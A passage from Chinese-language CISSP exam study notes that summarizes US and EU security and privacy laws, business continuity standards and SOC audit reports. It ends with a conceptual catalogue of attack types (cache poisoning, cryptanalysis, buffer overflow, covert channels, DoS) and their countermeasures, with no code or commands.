GISRA(The Government Information Security Reform Act)对它进行了修正。 7.政府信息安全改革法案(2000 年) GISRA (Government Information Security Reform —276— Act of 2000) 国会要求 GISRA-2000 的拟制满足以下五个基本目标: ①要提供 1 个内容全面的体制。确保所有政府相关的信息资源安全、有效。 ②要确保网络协同安全、有效。一切系统都是基于网络的,所以必须安全。 ③要有效监控和掌握所有与安全风险相关的活动和信息。每个人的每个行为都要被监控。 ④开发和维护联邦政府的信息安全防护系统。既要满足安全需求,也要实现最小成本。 ⑤提供改进机制。能持续优化、完善联邦机构的信息安全监督体系。 GISRA 仍然明确,NIST 负责非机密系统,NSA 负责机密系统,并实行领导负责制。 GISRA 重新定义了计算机系统的分类,明确了关键系统要满足以下条件: ①被法律条款定义为国家安全系统。 ②有机密信息且被相应的措施保护。 ③系统被攻击会对机构的业务产生不良影响。 在这之后,国会总算不再折腾了,没有通过任何新的关于计算机犯罪的重大事项。虽然提 了一些草案,都还没通过,如:2012 年的网络安全法案和 2013 年的网络情报共享和保护法案。 8.联邦信息安全管理法案 FISMA(Federal Information Security Management Act) 在 2002 年通过的联邦信息安全管理法案(FISMA),要求联邦政府实施一个信息安全项目, 涵盖了政府部门的运营和外包商的活动。NIST 开发了 FISMA 的实施指南,提出了确保信息安 全项目有效的关键要素:定期评估风险、安全意识培训、定期渗透测试、记录突发情况、制定 应急响应流程等。 C.4 保护知识产权方面 1.数字千禧年版权法案(DMCA)(Digital Millennium Copyright Act) DMCA 中有 2 个条款(打击盗版): ①阻止用户破坏版权保护机制。非法的复制会被处以巨额罚款。 ②网络服务商(ISP)的线路被用于传播盗版,也要承担相应的责任。 2.经济间谍法案(1996 年)(Economic Espionage Act of 1996) 经济间谍法案(1996 年)主要有 2 个规定: ①任何被发现为外国政府或机构而从美国公司窃取商业秘密的人,可以被处以高达 50 万 美元的罚款和长达 15 年的监禁。 ②任何被发现其它情况中窃取商业秘密的人,可以处以 25 万美元的罚款和 10 年的监禁。 3.统一计算机信息处理法案 UCITA(Uniform Computer Information Transactions Act) 统一计算机信息处理法案(UCITA),提供了计算机相关业务处理的共同架构,包括对软件 许可证 software license 颁发的规定。UCITA 为各种形式的许可提供了法律描述和保护。还 要求用户可以在安装之前拒绝许可证协议,生产商必须全额退款。它要求不同州之间的“许可 协议”都符合统一的标准。 4.瓦森纳协议(Wassenaar Arrangement) WA 是对“常规武器和两用货品及技术”实施进出口管制的法律,来用阻止恐怖国家的军 事实力增强,由 40 个国家共同制定了 9 类端口的出口规范,包括特殊材料、高科技设备、保 —277— 密机等产品。 C.4 个人隐私方面 一、美国有关隐私的法律 好多,眼花缭乱。 ①第四修正案(Fourth Amendment of the Constitution) 隐私权的基础是美国宪法的第四修正案,内容如下:法律保护个人的人身、房屋、证件和 财物不受无理的搜查和没收。搜查检索必须要有许可。 ②隐私法案(1974 年)(Federal Privacy Act of 1974) 美国的隐私法案(1974年)是对美国联邦政府有关公民个人私有信息处理的最重要的法律。 任何机构在没有得到当事人书面同意的情况下,不得向他人泄漏隐私信息。 ③电子通信隐私法案(1986 年)ECPA(Electronic Communications Privacy Act of 1986) 电子通信隐私法案(ECPA)规定对个人电子隐私的侵犯是犯罪行为。最重要的规定禁止窃 听,否则处以最高达 500 美元的罚款和最高 5 年的监禁。(其实美国在窃听全世界) ④执法通信协助法案(1994 年)CALEA(Communications Assistance for Law Enforcement Act) 执法通信协助法案(CALEA)是对上面那个 1986 年的电子通信隐私法案的修正。它要求通信 运营商允许持有法院命令的执法人员进行合法窃听。 ⑤经济和专有信息保护法案(1996 年)EPPA(Economic and Protection of Proprietary information Act of 1996) 该法案将经济信息也视为财产,盗窃并不局限于物理产品。 ⑥健康保险的流通和责任法案(1996 年)HIPAA(Health Insurance Portability and Accountability Act of 1996) HIPPA 经常被考到,它要求医院、医师、保险公司和其它处理或存储个人医疗隐私信息的 组织采取严格的安全措施,明确定义了个人在医疗记录方面的权利。 ⑦2009 关于经济和临床健康的卫生信息技术法案 HITECH(Health Information Technology for Economic and Clinical Health Act of 2009) 关于经济和临床健康的卫生信息技术法案(HITECH)对 HIPAA 进行了修订。主要变化是针对 商业伙伴(BAs)的。它将所有相关机构定义为:处理被保护的健康信息(PHI)的组织机构。任 何 PHI 机构和一个商业伙伴(BA)之间的关系必须有书面合同管理,这个合同被称为业务联合 协议(business associate agreement,BAA)。 HITECH 是全国性的法律。此外,每个州都颁布了自己的相关法规。加利福尼亚州的 SB1386 是第一个发布的,涉及以下隐私信息:社会保险号、驾照号码、身份证号码、信用卡或借记卡 号码、银行账户与安全代码、病历、医疗保险信息等。 HITECH 还明确了数据泄露的通告范围:发生泄密事件的 PHI 机构必须通知受影响的个人, 影响超过 500 人时,必须通知卫生和人事服务部(the Secretary of Health and Human Services)的部长和媒体。 ⑧数据泄露通知法 DBNL(Data Breach Notification Laws) —278— 若有泄密事件,当事单位必须在 60 天以内通知个人信息被非法访问。(如果影响超过 500 个人,还必须向媒体发布相关事件)。 ⑨儿童联机隐私保护法案(1998 年)COPPA(Children’s Online Privacy Protection Act of 1998) 儿童联机隐私保护法案(COPPA)对儿童网站的信息保护提出了一系列要求。它要求任务 组织必须要取得父母的同意后,才能收集 13 岁以下儿童的信息。 ⑩Gramm-leach-Bliley 法案(1999 年) GLBA/金融服务现代化法案/格蕾姆 GLBA-1999,严格限制了银行、保险公司等商业机构之间的信息共享和服务提供,还要机 构定期向用户发对账单。 ⑾美国爱国者法案(2001 年)(USA PATRIOT Act of 2001) 这个是国会对 2001 年 911 事件的响应。它扩大情报机构的权限,将以前一次只能获取一 条线路的监听授权扩大为可以获得对一个人的有所通信进行监听的一揽子授权。另一方面,允 许网络服务提供商(ISPs)提供更多的信息。它还修正了计算机欺诈和滥用法案(CFAA),对犯 罪行为从重处理。 ⑿子女教育权利和隐私法案 FERPA(Family Educational Rights and Privacy Act) FERPA 是关于教育机构的,保护成年学生和未成年学生父母的隐私权。 ⒀身份偷窃和冒用阻止法案(1998 年)(Identity and Assumption Deterrence Act) 就是规定身份偷窃是严重的犯罪行为。 ⒁萨班斯-奥克斯利法案(SOX-2002) Sarbanes-Oxley ACT 2002 年的该法案(简称为 SOX)适用于在美国上市的任何公司,其中的许多法律被用于监管 会计行为以及公司上报财务状况所使用的方法。然而,某些部分(特别是 404 条款)直接适用于 信息技术。SOX 对公司如何追踪、管理和报告财务信息提出了专门要求,这包括保护财务数据 并保证它的完整性与真实性。大多数公司都依赖计算机设备和电子存储来进行事务处理和数据 归档,因此公司必须采用适当的流程和控制来保护这些数据。公司管理人员,包括首席执行官 (CEO)、首席财务官(CFO)和其他人员,如果不遵守 Sarbanes-Oxley 法案,那么可能导致严厉 的处罚,甚至可能会入狱数年。 二、欧盟有关隐私的法律 ①概括指令/数据保护指令(directive outlining privacy measures)《指令 95/46/EC》 1995 年,欧盟(EU)议会也通过了描述隐私措施的概括指令(directive outlining privacy measures)。要求所有个人数据的处理要满足有关标准,明确了个人对自己信息的处理权利。 ②美国—欧盟安全港湾项目/安全避难所(避风港 Safe Harbor program) 经过与联邦数据保护和信息、委员会的商讨,美国商务部开发了独立的安全港湾框架来调 和欧美对于隐私不同的处理方式,并给美国组织提供一种优化的方法以符合欧盟数据保护法的 要求:数据出口方和进口方之间的合同必须需要事先获得国家数据保护当局的批准,方可传输 数据到国外。为了符合安全避难所规定,在欧洲进行商业活动的美国公司必须满足 7 项处理个 人信息的要求。这里强调下经常考的 7 个安全港原则。这是美国贸易部的一个控制机制,防止 未授权的信息泄露,相关的术语有: —279— 1)通知 notice:任何组织必须告知个人使用数据的目的。(告知我) 2)选择 Choice:任何组织必须为个人提供可选择的机会。(我选择) 3)向前传输 Onward transfer:组织只有在遵守通知及选择规则的基础上才能向其他组织 传输资料。(别乱传) 4)安全 Security:组织必须保护好数据。(别泄密) 5)数据完整 Data integrity:组织不得将信息挪用,还要确保数据真实可信。(别乱改) 6)访问 Access:个人可以查、改或删组织所持有的他们的个人信息。(属于我) 7)执行 Enforcement:组织必须落实以上各条原则。(别搞事) 三、支付卡行业数据安全标准(Payment Card Industry Data Security Standard) 支付卡行业数据安全标准(PCI-DSS) 是一个非法律但有合同义务的优秀合规要求典范。有 12 个主要要求,不列举了。它提供了一系列关于支付安全控制的标准。 四、数据泄露方面的 1.电子通信服务规范(Regulation for Electronic Communication Service,EU:2013) 欧洲电子通信服务提供者,需要在检测到个人数据泄露后不迟于 24 小时向国家主管当局 提供个人数据泄露的数据泄露通知。 2.隐私和电子通信法规(Privacy and Electronic Communications Regulations.UK: 2013) 电子通信服务提供商,诸如电信,互联网服务供应商(ISPs),在知道数据泄露的基本事实 后必须在 24 小时内通知 UK 信息专员办公室。 C.5 业务连续性方面 1.NIST 800-34 中的业务连续性规划的流程 业务连续性规划中的业务影响分析 BIA 是很重要的内容,在第一域的 G.2 章节已经详述了 相关流程。 NIST800-34 文档是专门针对 IT 的应急计划,当然,它也同样适用于制定企业级的 BCP 和 BCM。所有的团队成员都有义务参加变更控制程序。评审应按 BCP/DRP 策略进行,一般每 3 个 月组织 1 次审查,每年进行 1 次正式审核,或者有任何重大的组织改变的时候。 ①制定业务连续性规划策略声明。——连续性策略,为计划和建立 BCP 的工作提供了框架 和管理,包括:范围、任务、原则、指南和标准。 ②进行业务影响分析(BIA)。——业务影响分析,包括风险评估和资产赋值,流程为: 搞数据收集、定关键业务、定依赖资源、算资源寿命、定漏洞威胁、算业务风险、写分析报告。 ③制定预防性控制方法。——控制措施 ④制定恢复战略。——恢复战略 ⑤制订应急计划。——制定 BCP ⑥测试计划及进行培训和演练。——测试和演练 —280— ⑦维护计划。——维护计划 项目的单个目标必须进行分析,证明计划是有用可行的,确保每一个目标是能够实现的。 即 SWOT 分析,其基本元素包括: *优势 Strengths——项目团队的特点,使其比其他团队具有更大的优势。 *劣势 Weaknesses——相对于其他团队,使该团队处于不利地位的特征。 *机会 Opportunities——可以促进项目成功的元素。 *威胁 Threats——可能促使项目失败的元素。 ①BS 25999 英国标准协会(BSI)的业务连续性管理(BCM)标准。BS 标准有两个部分: *25999-1:2006 BCM 业务守则,提供过程、原则、术语体系,即提供业务连续性管理的 相应过程、原则和术语体系的一般指南。 *25999-2:2006 BCM 规范,说明执行目标及审核需求,即细说明执行、运作和增强一个 BCM 系统的目标以及审核需求。 ②ISO/IEC27031:2011 业务连续性的 ICT(信息和通信技术)准备指南。 此标准是 IS0/IEC27000 整个系列标准的一个组成部分。 ③ISO 22301 业务连续性管理体系的国际标准,取代 BS-25999-2。 ④GPG(业务连续性协会的优秀实践指南) —281— BCM 的最佳实践,分为管理实践和技术实践: *管理实践方面:策略和程序管理;在组织文化中嵌入 BCM。 *技术实践方面:理解组织;确定 BCM 战略;制定和实施 BCM 响应;演练、维护和修订。 ⑤DRI 国际协议的业务连续性规划人员专业实践 将业务连续性管理流程分解为以下 10 个部分: *项目启动和管理。 *风险评估和控制。 *业务影响分析。 *业务连续性战略 *应急响应和运作。 *业务连续性规划 *宣传和培训计划。 *业务持续计划演练、审核和维护 *危机沟通。 *与外部代理机构的协调 ISO/IEC270031:2011 业务连续性的 ICT(信息和通信技术)准备指南。 BS-25999 业务连续性管理标准(BCM),包括: 25999-1:2006 BCM 业务守则,提供过程、原则、术语体系。 25999-2:2006 BCM 规范,说明执行目标及审核需求。 ISO22301 业务连续性管理体系的国际标准,面向准备进行认证的组织机构,取代 BS-25999-2 NIST800-34 概述了信息技术系统的业务连续性指南(即针对 IT 的应急计划) ①制定业务连续性规划策略声明。 ②进行业务影响分析(BIA)。 ③制定预防性控制方法。 ④制定恢复战略。 ⑤制订应急计划。 ⑥测试计划及进行培训和演练。 ⑦维护计划。 GPG(业务连续性协议的优秀实践指南) BCM 的最佳实践,分为管理实践和技术实践: DRI 国际协议的业务连续性规划人员专业实践 将业务连续性管理流程分解为以下几个部分: —282— C.6 法律法规方面 欧洲理事会网络犯罪公约(Council of Europe (CoE) Convention on Cybercrime) 是针对网络犯罪而尝试创建的一个国际性标准。它是第一个通过协调国际法和改善调查技 术与国际合作来打击计算机犯罪的国际公约。这个公约的目标包括形成一个框架,用于建立被 告的司法裁判和引渡。例如,只有双方都裁判具体事件是犯罪时,才可能进行引渡。 经济合作与发展组织((Organisation for Economic Co-operation and Development, DECD)指导原则以及越境信息流(transborder informationflow)规则。 DECD 为不同的国家提供交换数据的指导原则,以对数据进行适当保护,帮助不同的政府 展开合作,处理全球化经济所面临的经济、社会和管理挑战。 欧洲的数据保护目录((Data Protection Directive)和欧盟隐私原则(European Union Principles on Privacy) 欧盟原则主要与使用和传输敏感数据有关,它被包含在欧洲的数据保护目录((Data Protection Directive)中。任何想要与欧盟国家做生意的企业如果涉及敏感数据交换,需要 遵照这些原则和数据保护目录。欧盟的隐私保障比其它国家要严格很多。 SAS70 审计员用来评估服务机构的控制措施的一套审计标准,它涉及顾客对财务报告的内部控 制。计算机业延伸了 SAS70 的用途,还有其他类型的评估方法,如 WebTrust(电子商务控制) 和 SysTrust(营控制),但上述这 3 种评估标准都不能满足从整体上确保外包服务安全可靠的 需要。所以又开发了新的评估标准来更好地满足公司的需要。那就是: 服务组织控制(Service Organization Controls, SOC) SOC 1:关于金融控制。 SOC 2:关于信托服务(安全性、可用性、机密性、处理完整性和保密性)。 SOC 3:关于信托服务(安全性、可用性、机密性、处理完整性和保密性)。 SOC2 和 SOC3 的区别: SOC 2 报告是关于信托服务的公司所采取的控制措施的详细数据,描述了审计员所做的测 试、测试结果和审计员对每个控制措施和系统有效性的意见,并不提供给公众。 SOC 3 报告只陈述系统是否符合特定信托服务的标准要求,没有测试信息和控制措施的详 细信息,可以用于通用目的,通常被用作“认可标识”,放置在服务提供商的网站和营销担保 物上。 ISO/IEC27002:2005 其中 6.2.1 条款提到的“识别外部单位相关的风险”,用于在聘请第三方服务供应商之前, 对信息安全问题应加以界定和评估。 —283— PCI-DSS 标准 GPC 计划(治理、风险和合规计划) 业务记录特例/例外规则或业务进入规则 美国联邦证据法规(Federal Rules of Evidence FRE)的传闻规则中的一个法律特例, 它表明,下列情况中的任何记录是被承认的:①记录是在正常的业务过程中作出的;②该业务 定期作出这样的记录;③是在或者接近被记录事件发生的时间做出的;④该记录包含由知悉该 文档内信息的人传输的信息。 E.攻击方法汇总 考试所有相关的攻击进行归纳、合并、罗列,教材中同一攻击会在多个章节中反复出现。 一、破坏机密性的攻击(第一域) 捕获网络通信、窃取密码、文件、社会工程、端口扫描、肩窥、偷听和嗅探攻击等。 造成机密性遭到破坏的非恶意攻击的意外事件有:未对传输数据进行加密,在传输数据之 前,未对远程系统进行充分的身份认证,一直打开不安全的接入点,访问恶意代码导致打开后 门,甚至在显示器上显示数据的时候,人从访问终端离开等。 二、破坏完整性的攻击(第一域) 病毒、逻辑炸弹、未授权访问、编码和应用程序的错误、恶意修改、有企图的替换以及系 统后门。造成完整性破坏的非恶意攻击的意外事件有:意外地删除文件,输入无效数据,更改 配置,命令、代码和脚本中包含错误,引入病毒以及执行恶意代码(例如特洛伊木马)等。 三、破坏可用性的攻击(第一域) 对可用性的威胁或攻击有很多,包括:设备故障、软件错误、环境问题(如高温、静电、 洪水、断电等),还包括 DoS 攻击、客体损坏和通信中断等。造成完整性破坏的非恶意攻击的 意外事件有:意外地删除文件,硬件或软件组件的使用过度,私下分配资源,贴错标签或不正 确的客体分类。 四、基于客户端的攻击(第三域) 主要是本地缓存攻击 ①ARP 缓存中毒 ARP 协议是将 IP 地址解析为 MAC 地址的协议。这种攻击使客户端传输的数据流发送给不 是预期的其它系统(另一个 MAC 地址),这种攻击也被用来做中间人攻击。动态 ARP 缓存:攻 击者回应 ARP 广播查询并发送伪造的回复,这样 ARP 缓存一起缓存,直到超时(通常是 10 分 钟)。静态 ARP 缓存:本地执行 ARP 命令,这需要通过木马、缓冲区溢出或社会工程攻击才能 在客户端运行。 —284— ②DNS 缓存中毒 另一个比较流行的中间人攻击方式,类似于 ARP 缓存,让主机访问别的地址。主要手段有: 主机中毒、授权 DNS 服务器攻击、缓存 DNS 服务器攻击、DNS 查找地址改变以及 DNS 查询欺骗。 主机文件 HOSTS file:将常用的或访问过的域名(域名也被称为 FQDN:fully qualified domain name)与 IP 地址的映射存储在本地,方便下次上网用,提高速度。修改这个文件就可 以让访问重新定向。 授权 DNS 服务器攻击 Authorized DNS server:直接修改权威 DNS 服务器(根服务器)的 数据库,于是全网的域名解析都被篡改了,很严重,所以很快会被发现并纠正的。 缓存 DNS 服务器攻击 caching DNS servers:运营商或企业为了速度,缓存了从其他 DNS 服务器获得的 DNS 信息,搞它要容易多了,也不易被发现。 DNS 查找地址改变 DNS lookup address changing:这个很直接,通过修改 DHCP 服务器或 修改本地静态 IP 地址,篡改主机的 DNS 地址,让主机到另一个伪造的 DNS 服务器上去查询。 DNS 查询欺骗 DNS query spoofing:这个有点难,但也经常发生。攻击者截获主机的 DNS 查询请求,然后发回错误的结果,让主机访问错误的网站,把 DNS 服务器屏蔽了。 ③Internet 临时文件中毒 上网浏览时,所有网站的内容都被缓存到本地的临时文件夹里。被植马的网站页面文件(图 片、HTML 什么的)会被缓存到本地,然后就等待被调用或激活。 五、针对密码加密的攻击(第三域) ①分析攻击(Analytic Attack)/代数攻击。分析并利用算法本身的数学逻辑性,找出更 简单的替代的算法。 ②实现攻击(Implementation Attack)/执行攻击。利用加密程序存在的漏洞,简单易 行,破密首选。包括 3 种形式: *旁路攻击 Side-channel analysis,依靠能量消耗、放射性等密码系统运行时的物理属 性来攻击,如计时分析和电磁差分分析。 *故障分析 Fault Analysis,通过注入错误信息来对比、记录、分析系统的加密漏洞。 *探测攻击 Probing Attacks,在密码模块周边进行探测和注入,希望能采集到算法或密 钥什么的。 ③统计攻击(Statistical Attack)。利用密码系统的统计弱点,例如无法真正生成随机 数,浮点运算的错误等。统计攻击试图发现运行密码系统的硬件或操作系统的漏洞。 ④穷举攻击(Brute Force/Exhaustive search)。暴力攻击。为了提高速度,通常使用 彩虹表。密码一般以散列值的方式存在数据库里,彩虹表是预先计算和整理出的散列值映射表, 可以大幅提高猜解速度。 ⑤仅知密文/唯密文攻击(Ciphertext Only Attack)。最难的攻击,因为只有几条密文, 其它啥也没有。只能通过频率分析进行统计学的攻击和预测。因为 26 个字母中,E,T,O,A,I, 是出现频率最高的。 ⑥己知明文攻击(Known Plaintext)。手上有明文,也有密文,然后想办法破解。 ⑦选定密文/可选密文攻击(Chosen Ciphertext)。手上有密文,只有部分密文有明文。 —285— ⑧选定明文/可选明文攻击(Chosen Plaintext)。可以加密部分明文得到密文。 ⑨中间相遇攻击(Meet in the Middle)。面向加密运算,通过计算查找出密钥对(K1 加密的密文可以用 K2 解密),便两轮加密算法即双重 DES(2DES)的实际强度和一轮加密一样。 ⑽中间人攻击(Man in the Middle)。面向通信链路,在攻击者以通信代理的方式插入 收发又方的通信,截获所有数据流。 ⑾生日攻击(Birthday)。也称为冲突攻击或逆向散列匹配,利用生日悖论来进行穷举攻 击和字典攻击,寻找可以生成相同消息摘要的不同消息。 ⑿重放攻击(Replay)。既然破不了密,就截获加密的消息,下次直接重复使用它来进行 身份验证什么的。如果系统有时间戳,这个方法就不能用了。 ⒀微分/差分密码分析(differential cryptanalysis)。 差分密码分析攻击以找出加密密钥为目标。这种攻击会查看对具有特定差异的明文进行加 密而生成的密文对,并且分析这些差异的影响和结果。它在 1990 年作为一种针对 DES 的攻击 发明出来,后来演变成为一种针对 DES 和其他分组算法的成功而有效的攻击。攻击者使用两 条明文消息,并在它们经过不同的 S 盒时跟踪分组上发生的变化(每条消息都以相同的密钥加 密)。得到的密文中已确定的差异用于推测不同可能密钥值的概率。攻击者使用其他几组消息 继续上述过程,并检查公共密钥概率值。随着加密过程中的大多数可能值都被用到,密钥也就 逐渐显露出来。由于攻击者选择不同的明文消息进行攻击,因此它也是一种选定明文攻击。 ⒁线性密码分析(linear cryptanalysys)。是一种已知明文攻击,利用线性近似来描述块 密码的行为。如果有足够多的明文和相应密文对,便可得到有关密钥的少许信息,而数据量的 增加通常会给成功带来更高可能性。 ⒂彩虹表。彩虹表是对散列输出进行过分类处理的查询表,相当于密码字典的作用,提高 了破解速度。 ⒃因子分解攻击。以 RSA 算法为目标。由于该算法用大质数的乘积生成公钥和私钥,这种 攻击试图通过分解这些数的因数来找出密钥。 ⒄逆向工程。这种攻击很常用。买一套同款的密码系统,反编译来分析算法找漏洞。 ⒅社会工程。坑蒙拐骗、威逼利诱什么的。 六、基于编码缺陷的攻击(第三域) ①维护钩子和特权程序 Maintenance Hooks and Privileged Programs 就是后门。A maintenance hook(维护钩子)、A back door(后门)、A trap door(陷 门)都是一样的。但都不是 A Trojan horse(木马)。 ②增量攻击 Incremental Attacks 某些攻击形式以缓慢的、渐进的增量方式发生,而不是通过明显的或可识别的活动来危害 系统的安全性或完整性。对数据进行细小的、随机的或增量的改变是不容易被发现的。数据欺 骗和 salami 攻击就是这样的攻击形式。Salami 就是每次雁过拔毛(就薅一点羊毛)。它的另 一种说法就是 Data diddling(数据欺骗)。 加密的文件系统可以保证不会发生数据欺骗。对于 salami 只有通过适当的责任分离和对 代码的适当控制,才能完全阻止或消除,尤其是金融上要监控小额交易。 —286— ③竞争条件 race conditions ——检查时间/使用时间(TOC/TOU) 竞争条件和 TOC/TOU 攻击之间的差异是细微的,但安全专业人员必须理解它。 检查时间/使用时间:发生在多任务操作系统中,就是在两个进程中强插一个进程。如: 进程 1 用来验证和授权用户,进程 2 用来调用被授权访问的这个文件;如果攻击者重定向进程 2 打开另一个涉密的文件,那么攻击者就执行了 TOC/TOU 攻击。为了避免 TOC/TOU 攻击,操作 系统使用软件锁的概念,即对进程要访问的文件或资源使用一个锁,此时,这个文件不能被另 外一个文件取代。 竞争条件:是 TOC/TOU 攻击的另一种形式,攻击者操纵两个进程的执行顺序,强制其乱执 行。多个进程要使用同一个资源时,竞争条件就会发生。如:先验证后访问的顺序被颠倒过来。 为了防止条件竞争攻击,程序应该不允许关键任务被分开执行,系统内要实现原子操作。 ④高级持续性攻击(advanced persistent threat, APT)。 “震网”事件就是 APT。 特点:常用于军事,一般是一个攻击团队,具有很强的能力和技巧(高级性),资金充足, 针对具体明确的特点目标,低调隐蔽择机行动(持续性)。 防御:杀毒等主机检测方法是查不出高级木马的,通常通过分析网络流量来判断,即主机 有新的 IRC 连接时,则表明系统里有僵尸在尝试与外部命令中心通信。 ⑤洛基攻击 Loki Loki 攻击是今天最常用的一种隐蔽通道,这种攻击使用 ICMP 协议进行通信。Loki 工具允 许攻击者紧接着 ICMP 首部之后写入数据。 ⑥中间人攻击 入侵者将自己插入两台计算机正在进行的对话中,因而能够拦截并阅读它们之间来回传送 的信息。使用数字签名和相互身份验证技术可以防止这类攻击。 ⑦泪滴攻击 这种攻击向受害者发送畸形的分片数据包。通常,受害者的系统并不能正确地重新装配这 些数据包,因此造成死机。 防止这类攻击的对策是给系统安装补丁,并使用进入过滤以检测这些数据包。 ①缓冲区溢出:有很多方法创建或利用缓冲区溢出,但下面是个缓冲区溢出是如何工作的 一般示例。一个是攻击目标的程序,被提供了比这个应用想处理的更多的数据。这可以通过很 多方法完成,如在一个对话框中输.入过多的文本,提交一个太长的 web 地址,或创建一个比 需要大得多的网络报文。被攻击的程序(目标)溢出了分配给输入数据的内存并且把超出的数据 写入了系统内存。过量的数据可能包含机器语言指令,这样当下一步执行时,攻击代码,像 Trojan 木马或其它类型的恶意代码,就会运行。(经常地,多佘数据的靠前部分包括被 CPU 读 做“无操作”(NOP)的字符,形成一个“NOP”雪橇。恶意代码通常在多余数据的末尾。 实际的攻击方法更为详细且高度依赖目标操作系统和硬件架构。追求的结果就是把攻击代 码放入到内存。这些指令通常做一些,诸如以一定方式给内核打补丁来在一个提升的权限级别 执行另一个程序的事情。有时,恶意代码将调用其他程序,或甚至从网络上下载它们。 ②全民程序员:由于台式和个人计算机(甚至应用程序,现在)都配备了脚本和编程工具, 允许所有计算机用户创建他们自己的工具是一种常见的做法。这可能产生极其有害的后果并且 —287— 可能违反职责分离的原则。如果允许这种未被监管的编程,那么一个单独的用户可能完全控制 一个应用或过程。虽然传统上程序员很少或没有接受过安全需求培训,他们至少也要对软件质 量,可靠性和互操作性的问题有基本的了解。普通用户没有这样的培训并且可能创建安全和可 靠性都有问题的应用。Visual Basic,包含在 1vlicrosoft Office 套件中,经常被全民程序 员用来开发他们的应用或扩展一个存在的应用。公民,或普通的,程序员不可能经过系统开发 实践培训或约束,其涉及正确的应用设计,变更控制,和应用的支持。因此,以这种方式开发 应用可能是混乱的并且缺少对安全的任何形式的保证。在需要的时候,它应该作为策略,执行, 意识,和约束的问题解决。 ③隐蔽信道:一个隐蔽信道或限制问题是一个信息流问题。它是一个通信信道,允许两个 协作的进程以违反系统的安全策略的方式传递信息。即使已经存在保护机制,如果末授权的信 息可以通过信号机制在实体或对象之间传递,其通常被认为不能通信的,那么一个隐蔽信道可 能存在。用简单的术语,它是任何的信息流,故意的或无意的,它使一个没有这个信息、的授 权的观察者,可以去推断它是什么或它的存在。这在包含高度敏感信息的系统中是重要的问题。 通常定义的隐蔽信道类型有两类:存储和时间。 一个隐蔽存储信道涉及一个进程直接或间接读取存储位置同时另外一个进程也在直接或 间接地读取相同的存储位置。通常,一个隐蔽存储信道涉及有限的资源,例如内存位置或磁盘 上的扇区,其被在不同安全级别的两个主体共享。 一个隐蔽时间信道取决于能够影响一些其他进程能获取资源的速率,例如 CPU,内存,或 I/O 设备。速率的变化也许可以用来传递信号。本质上,把信自、的传递给其它进程的进程调 制它自己对系统资源的使用,以这样的方式进行,这个调制影响了第二个进程观察到的真实的 啊应时间。通常认为时间信道没有存储信道效率高,因为它的带宽减小了,但它们通常更加难 以检测和控制。 这些例子只与一种情景相关,其中一个内部人员试图给外部人员提供信息且在应用中受到 很大限制。为了对隐蔽信道有一个全面的见解应该设想一个更广泛的概念,它包括,例如,无 意的隐蔽信道,其使一个未明或未授权的人员可以观察一个系统的活动,其使一个不应该知道 的人可以推理事实。 ④格式不正确的输入攻击:目前己知,一些攻击利用来自用户的输入,并且各个系统检查 和防范此类攻击。因此,一些新的攻击依赖于以不寻常的方式配置那个输入。例如,一个攻击, 其将 web 浏览器重定向到另外一个站点,可能被防火墙通过检测一个不当站点的统一资源定位 符(RUL)而捕获。然而,如果该 URL 用 Unicode 编码而不是 ASCII,防火墙可能会无法识别这个 内容,而 web 浏览器则很容易地转换这个信息。 在另一种情况,很多站点允许请求访问数据库,但在请求上放置过滤器来控制访问。当允 许请求使用结构化查询语言(SQL)时,在查询中使用某些特定语法结构可能骗过过滤器,其把 查询看成了注释,于是查询可能提交到数据库引擎并且取回比所有者允许的更多的信息。在另 一个例子中,一个站点允许用户输入信息让以后其他用户检索,例如一个博客,当输入以活动 脚本的形式时,可能无法检测到。这是跨站脚本攻击的基础。(缓冲区溢出也是格式不正确输 入的一种。) ⑤内存重用(对象重用):内存管理涉及分配给一个进程一段时间内的内存段,然后取消分 —288— 配,然后重新分配给另一个进程。因为残留的信息可能保持,当之前的进程用完它之后,一个 内存段可能被重新分配给一个新进程,一个安全违反可能出现。 当内存被重新分配后,操作系统应该确保内存被彻底清零或完全写覆盖,在它在能被新进 程访问之前。因此,内存中没有残留信息从一个进程带到另外一个进程。在这方面内存位置是 首要关心的问题,开发者也应该小心重用其它可能包含信息、的资源,例如磁盘空间。磁盘上 的分页或交换文件经常得不到保护,如果没有小心地采取保护,可能包含大量的敏感信息。 注意,内存或对象重用可能是隐蔽信道的一种形式,如前面所讨论。 ⑥可执行内容/移动代码:可执行内容,或移动代码,是一种软件,它从远程源通过网络 传输到本地系统,然后在本地系统上执行。代码的传输是由用户的行为触发的,在某些情况下, 没有用户明确的行动。该代码可能作为电子邮件的附件或通过网页到达本地系统。 移动代码有很多名称:移动代理,移动代码,可下载代码,可执行的内容,活动的胶囊, 远程代码等。尽管词语似乎是相同的,但也有细微的差别。例如,移动代理是可以从主机迁移 到网络中的主机的程序,有时可能是它们自己选择的位置。它们高度自治,而不是直接地受控 于一个中心点。移动代理不同于小程序,它们是作为用户的操作结果而下载的程序,之后从头 到尾都是在一个主机上执行。例子包括 ActiveX 控件,Java 小程序,和运行在浏览器中的脚 本。所有这些都与远程源代码在本地执行相关。 七、针对网络的攻击(第四域) 1.DoS 和 DDoS/ denial-of-service 拒绝服务攻击是一种资源消耗型攻击,它以阻止受害系统的合法活动为主要目标。DoS 不 是一个单一的攻击,而是指一类攻击。一些攻击利用操作系统软件的缺陷,而其他的则把重点 放在安装的应用程序、服务或协议。一些攻击利用具体的协议,包括互联网协议 IP,传输控 制协议 TCP,lnternet 控制消息协议(ICMP)和用户数据报协议 UDP 等。 靠一台主机攻击显然力量不够,最好是 DDOS,通过僵尸网络来搞,还能隐藏自己。 怎么防 DOS 不说了,应该都想得到。考试中有使用 tarpit 来防御 DOS,类似于蜜罐,是 一个模拟的有漏洞的服务组件,当遭受一些非法扫描等攻击时,它会让攻击者的自动扫描的工 具软件出现响应失败或连接超时。 2.偷听/窃听 Eavesdropping 窃听需要搭线。由于使用的是被动攻击方式,因此检测偷听设备和软件通常较为困难。如 果偷听或窃听从而更改通信数据或在其中添加数据,则属于主动攻击类型。Sniffers、 NetWitness、T-Sight、Wireshark、Zed Attack Proxy (ZAP)等好多工具可以用。 保证在内部基础架构之外安全可靠地传输数据是极其重要的,就是要加密。 3.假冒/伪装 Impersonation/Masquerading 模仿或是伪装,是一种假装是某人或假装是某物并获得未经授权而访问系统的行为。这通 常意味着认证证书被窃取或者遭受篡改并满足(即成功地绕过)认证机制。这不同于欺骗,实体 提出了一个虚假的身份但没有任何证据(如错误地使用 IP 地址、MAC 地址、电子邮件地址、系 统名称、域名等)。模仿往往可以通过捕获网络服务会话设置中的用户名和密码加以实现。 